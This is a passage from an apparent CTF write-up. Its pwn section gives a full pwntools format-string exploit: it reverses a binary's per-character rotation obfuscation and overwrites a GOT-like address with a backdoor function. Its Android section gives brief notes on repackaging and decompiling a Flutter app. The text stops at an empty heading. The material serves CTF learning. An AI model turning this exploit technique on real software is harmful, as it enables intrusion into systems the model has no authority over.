Untitled

pwn

Baby’s First Format

[image] Provided by Psjsus4:

def generate_input(desired_output):
    """Invert the binary's per-character shift: given the string we want the
    program to end up with, return the string we have to type in."""
    input_chars = []
    for idx, c in enumerate(desired_output):
        # The binary rotates each lowercase letter / digit forward by (index % 7),
        # so we rotate backward by the same amount here.
        shift = idx % 7

        if c.islower():
            original_ord = ord(c) - shift
            if original_ord < ord('a'):
                original_ord += 26      # wrap around within a-z
            input_chars.append(chr(original_ord))

        elif c.isdigit():
            original_ord = ord(c) - shift
            if original_ord < ord('0'):
                original_ord += 10      # wrap around within 0-9
            input_chars.append(chr(original_ord))

        else:
            # Symbols and everything else are passed through untouched
            input_chars.append(c)

    return ''.join(input_chars)

Used to bypass the string-transformation obfuscation function the challenge author wrote themselves: sub_4012A8

Backdoor function: [image]

This challenge was not running on a remote server; the challenge author said the flag is hardcoded in the binary. [image] In the end, teammate Psjsus4 took first blood!

#!/usr/bin/env python3

# module from 0xfun-Psjsus4

from pwn import *
import pwn
from sys import argv
from os import getcwd

e = ELF("./baby_fmt_patched")

context.binary = e
context.terminal = ["kitty", "@", "new-window", "--cwd", getcwd()]
context.gdbinit = "/pentest/pwndbg/gdbinit.py"

r: process = None

# Zero-padded unpack helpers so short leaks can be unpacked without a length check
u64 = lambda d: pwn.u64(d.ljust(8, b"\0")[:8])
u32 = lambda d: pwn.u32(d.ljust(4, b"\0")[:4])
u16 = lambda d: pwn.u16(d.ljust(2, b"\0")[:2])
sla = lambda a, b: r.sendlineafter(a, b)
sa = lambda a, b: r.sendafter(a, b)
sl = lambda a: r.sendline(a)
s = lambda a: r.send(a)
recv = lambda: r.recv()
recvn = lambda a: r.recvn(a)
recvu = lambda a, b=False: r.recvuntil(a, b)

gdbscript = '''
b main
continue
'''

def conn():
    """Start the target: `./x.py gdb` debugs locally, `./x.py IP PORT` connects
    remotely, no arguments runs the patched binary locally."""
    global r
    if len(argv) > 1:
        if argv[1] == "gdb":
            r = gdb.debug([e.path], gdbscript=gdbscript)
        else:
            ip, port = argv[1], argv[2]
            r = remote(ip, port)
    else:
        r = e.process()

def generate_input_bytes(desired_output: bytes) -> bytes:
    """Byte-level version of generate_input(): undo the binary's (index % 7)
    forward rotation so that printf sees exactly `desired_output`."""
    input_bytes = []
    for idx, c in enumerate(desired_output):
        shift = idx % 7

        # Reverse lowercase letters (a-z)
        if ord('a') <= c <= ord('z'):
            original = c - shift
            if original < ord('a'):
                original += 26  # Wrap around alphabet
            input_bytes.append(original)

        # Reverse digits (0-9)
        elif ord('0') <= c <= ord('9'):
            original = c - shift
            if original < ord('0'):
                original += 10  # Wrap around digits
            input_bytes.append(original)

        # Symbols/others remain unchanged
        else:
            input_bytes.append(c)

    return bytes(input_bytes)

def exploit():
    payload = b"funny123"
    # Format string sits at stack offset 7; the 8 prefix bytes are already
    # counted as written. Overwrite the qword at 0x404028 with the backdoor
    # address 0x4015cd.
    payload += fmtstr_payload(7, {0x404028: 0x4015cd}, numbwritten=8)
    print(f"payload: {payload}")
    # Pre-invert the binary's transformation so the bytes printf actually
    # receives are the ones fmtstr_payload generated.
    payload = generate_input_bytes(payload)
    # Keep the literal "funny" prefix as typed.
    payload = b"funny" + payload[5:]
    payload = payload.ljust(106, b"a")
    sl(payload)
    print("good luck pwning :)")


conn()
exploit()

# good luck pwning :)
r.interactive()

Android

Invincible

The difference between .aab and .apk: [image] Releases · google/bundletool

java -jar bundletool-all-1.18.1.jar build-apks --bundle="invincible.aab" --output=output.apks --mode=universal

[image] We need to find the signature. But when I tried simply self-signing it in MT Manager, I found the app could be installed and opened: [image]

Flipping it as the app says to reveal the hint, there was no hint: [image]

Using the blutter project I successfully decompiled the Flutter app, and its output also includes scripts that restore most of the symbol information in arm64-v8a\libapp.so through IDAPython. The key problem then was working out which function offers an opportunity to hook.

Secure Chat Bounty